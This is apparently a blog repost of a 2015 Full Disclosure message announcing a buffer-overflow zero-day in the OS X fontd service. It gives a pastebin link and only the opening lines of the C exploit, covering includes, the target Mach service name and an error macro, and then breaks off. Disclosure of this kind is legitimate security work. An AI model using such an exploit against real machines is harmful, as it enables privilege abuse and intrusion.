Full Disclosure

OS X 0day – works on latest verz

April 30, 2015 007admin Leave a comment

Posted by 魏诺德 on Apr 30

BO exploitation @ fontd, allows payload to run code with fontd
privileges.

http://pastebin.com/XT7vnkXZ

#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>

#define SERVICE_NAME “com.apple.FontObjectsServer”
#define DEFAULT_MSG_ID 46

#define EXIT_ON_MACH_ERROR(msg, retval, success_retval) if (kr !=
success_retval) { mach_error(msg “:” , kr); exit((retval));…

Leave a Reply Cancel reply

You must be logged in to post a comment.

Software and Security Information